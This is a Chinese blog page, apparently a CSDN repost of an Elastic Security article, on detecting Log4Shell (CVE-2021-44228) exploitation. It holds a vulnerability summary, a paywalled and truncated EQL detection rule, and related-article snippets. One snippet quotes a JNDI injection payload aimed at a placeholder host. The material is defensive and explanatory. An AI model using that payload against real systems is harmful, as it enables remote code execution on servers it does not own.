使用 Elastic Security 检测 CVE-2021-44228 (log4j2) 的漏洞利用

最新推荐文章于 2025-07-11 16:59:00 发布
最新推荐文章于 2025-07-11 16:59:00 发布
阅读量5.9k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 点火三周的Elastic Stack专栏 文章标签: java 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013613428/article/details/121884609
这篇博文介绍了CVE-2021-44228 (Log4Shell) 的摘要,以及如何使用Elastic Security检测其漏洞利用。Log4j2的安全漏洞允许远程代码执行,影响多个版本。Elastic Security用户可以使用特定的检测规则来识别攻击。文章还提到了社区提供的检测方法和缓解策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

重要的提示 : 要了解 Elastic 当前如何评估我们产品中此漏洞的内部风险,请参阅此处

概述

这篇博文提供了 CVE-2021-44228 的摘要,并为 Elastic Security 用户提供了检测,以发现他们环境中对该漏洞的主动利用。

随着我们了解更多信息,我们将持续提供更多的更新。截至 2021 年 12 月 11 日星期六,此版本是准确的。可以通过Log4j2的安全页面直接调查来自 Apache 的更新。

CVE-2021-44228 (Log4Shell) 摘要

Log4j2 是一个开源日志框架,并被广泛的集成到最终用户系统和服务器上的许多基于 Java 的应用程序中。2021年11 月末,阿里巴巴的Chen Zhaojun发现了一个远程代码执行漏洞,最终被报告到 CVE:CVE-2021-44228,于 2021 年 12 月 10 日向公众发布。该漏洞是通过对传入框架的用户输入进行不当的反序列化而被利用的。它允许远程执行代码,并允许攻击者泄漏敏感数据,例如环境变量,或在目标系统上执行恶意软件。

该漏洞影响从 2.0-beta9 到 2.14.1 版本的所有 Log4j2 版本。早期修补该问题的方法导致了一些候选版本的出现,最终在本文发布时建议将框架升级到 Log4j2 2.15.0-rc2。

考虑到该日志库的已被广泛采用以及漏洞利用的复杂性,在任何已确定使用 Log4j2 易受攻击版本的软件环境中,缓解措施都应被视为至关重要。

使用Elastic Security检测对Log4Shell的漏洞利用

Elastic Security 用户可以使用以下事件关联检测规则来识别对 log4j2 漏洞的主动利用。

sequence by host.id with maxspan=1m
 [network where event.action == "connection_attempted
最低0.47元/天 解锁文章

新学期VIP享超值加赠
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍
m0_54899775的博客
12-13 2523
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍 史诗级漏洞
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-14 7423
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
CVE-2021-44228Log4j2漏洞
最新发布
m0_73399576的博客
07-11 983
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
Log4j2漏洞分析(CVE-2021-44228)
本散修的一些学习心得与笔记,道友请自便。
09-19 1874
深入理解Log4j2漏洞&&总结与思考
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Log4j2远程代码执行漏洞CVE-2021-44228
wangzhifei1的博客
01-16 3697
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
Apache Log4j2 远程代码执行 (RCE) 漏洞 ES-6.3.2 修复记录
qq_31285735的博客
12-18 2384
官方给出的修复建议: Elasticsearch 5.0.0-5.6.10 and 6.0.0-6.3.2: Log4j CVE-2021-44228, CVE-2021-45046 remediation - Security Announcements - Discuss the Elastic Stack 1、先安装zip 工具 yum -y install zip 2、进入es安装目录。 cd /usr/share/elasticsearch 3、搜索log4j的jar包。 ...
CVE-2021-22145 复现
03-31
根据用户提供的引用,虽然用户给出的引用链接是关于其他CVE的,比如CVE-2021-41773、CVE-2021-3156、CVE-2021-3493和log4j漏洞,但用户明确提到了CVE-2021-22145,所以我需要专注于这个特定的漏洞。 首先,我应该...
〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测
K8哥哥
12-18 4847
title: 〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测 comments: true toc: true categories: exp tags: Log4j2 abbrlink: log4shell date: 2021-12-16 19:24:00 img: https://img-blog.csdnimg.cn/20210117163103552.jpg 漏洞简介 Apache Log4j2是一款优秀的Java日志框架。近日,漏洞银行安全团队注意到了Ap.
ElasticSearch6.8.13解决Log4j CVE-2021-44228漏洞
qq_40864421的博客
12-14 5931
ElasticSearch6.8.13解决Log4j CVE-2021-44228漏洞
CVE-2021-44228漏洞复现
m0_65764670的博客
05-29 3256
漏洞log4j2漏洞log4j2java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
log4j2 远程代码执行漏洞复现(CVE-2021-44228
热门推荐
Welcome To Myon'Blog !
03-08 2万+
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用漏洞可在目标服务器上执行任意代码。
Elasticsearch未授权访问漏洞
12-22 7412
  Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 0x00 Elasticsearch 安装 前提,保证安装了JDK 1.7+ 下载地址:https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip (用迅雷打开下载,...
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 1242
CVE-2021-44228
log4j2 rce (CVE-2021-44228)
weixin_40151476的博客
03-01 1068
Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
log4j2: CVE-2021-44228[RCE]
h1008685的博客
08-07 831
漏洞概述CVE-2021-44228为Apache Log4j2漏洞,被称为"Log4Shell"。攻击者将恶意代码与服务器进行交互,使服务器日志组件将其记录并执行,从而造就RCE远程代码执行漏洞漏洞原理:Log4j2是一个日志记录工具,允许通过配置文件来定义日志的格式。日志格式中可以使用变量,这些变量在日志记录时会被替换为实际的值。:Log4j2支持使用${}来引用变量。例如,。:Log4j2还支持JNDI查找,允许通过的形式引用远程资源。:在Log4j2的某些版本中,如果日志配置不当,
CVE-2021-44228 Apache Log4j2 远程代码执行漏洞
qq_59201520的博客
03-28 445
Apache Log4j2 lookup feature JNDI injection (CVE-2021-44228)漏洞复现
CVE-2021-44228(log4shell-Quick Guide)
Websec
12-14 974
log4shell - Quick Guide 0x00 Introduction CVE-2021-44228(a.k.a. log4shell) is a Remote Code Execution vulnerability in the Apache Log4j library, a Java-based logging tool widely used in applications around the world. This vulnerability allows an attacke.
elasticsearch Apache Log4j 远程代码执行漏洞(CVE-2021-44228CVE-2021-45046)
03-07
elasticsearch和Apache Log4j都存在远程代码执行漏洞(CVE-2021-44228CVE-2021-45046),攻击者可以利用这些漏洞在受影响的系统上执行任意代码。建议用户尽快更新相关软件版本或采取其他安全措施来保护系统安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值